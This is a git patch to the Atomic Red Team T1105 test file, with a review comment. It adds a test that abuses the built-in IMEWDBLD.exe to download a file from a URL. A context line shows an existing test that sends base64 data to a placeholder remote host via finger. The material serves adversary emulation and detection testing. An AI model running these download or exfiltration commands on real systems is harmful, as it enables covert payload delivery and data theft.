From 6d46517d6fd9e0a88fc1cdac40688705e4e20aee Mon Sep 17 00:00:00 2001
From: Brian Thacker
Date: Thu, 9 Sep 2021 13:02:26 -0500
Subject: [PATCH] T1105 add test download with imewdbld (#1621)

* Add test "Download a file with IMEWDBLD.exe" IMEWDBLD.exe can be used to download files from third party websites. This will throw an error for an invalid dictionary but the file will still be downloaded. Commands to execute this activity and cleanup commands added. Cleanup commands call on cmd.exe because PowerShell by default would not remove those files. Disclosed by https://twitter.com/notwhickey https://twitter.com/notwhickey/status/136749340683504026
* Update T1105.yaml fixed typo test 17
Co-authored-by: Carrie Roberts
---
 atomics/T1105/T1105.yaml | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)

diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml
index a389073e..8652af08 100644
--- a/atomics/T1105/T1105.yaml
+++ b/atomics/T1105/T1105.yaml
@@ -414,3 +414,28 @@ atomic_tests:
     name: command_prompt
     command: |
       finger base64_filedata@#{remote_host}
+- name: Download a file with IMEWDBLD.exe
+  description: |
+    Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file.
+    Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]." or `%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]..
+    Run "Get-ChildItem -Path C:\Users\\AppData\Local\Microsoft\Windows\INetCache\ -Include * -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file.
+  supported_platforms:
+  - windows
+  input_arguments:
+    remote_url:
+      description: Location of file to be downloaded.
+      type: url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml
+    file_name:
+      description: Name of the file to be downloaded without extension.
+      type: string
+      default: T1105
+  executor:
+    command: |
+      $imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
+      & $imewdbled #{remote_url}
+    cleanup_command: |
+      $inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\"
+      $file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)
+      cmd.exe /c "del $file_to_be_removed"
+    name: powershell
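Review bot: In `cleanup_command`, `cmd.exe /c "del $file_to_be_removed"` interpolates a `[string[]]` into a single unquoted string, so the matched paths are joined with spaces and any path containing a space (INetCache sits under the user profile directory) is split into several `del` arguments, while an empty match runs `del` with no argument and errors out. Since the commit message says PowerShell alone would not remove these files, keep `cmd.exe` but delete one quoted path per item: `$file_to_be_removed = Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue` followed by `$file_to_be_removed | ForEach-Object { cmd.exe /c ('del "{0}"' -f $_.FullName) }`. The `description` also has a malformed path example (opened with a double quote, closed with a backtick, and ending in `/[1]..`), and `C:\Users\\AppData` is missing the username placeholder; suggest `C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\`. It may be worth stating in the description that the test is expected to fail on hosts where `%SystemRoot%\System32\IME\SHARED\IMEWDBLD.exe` is not present, or checking for the binary before the `&` invocation.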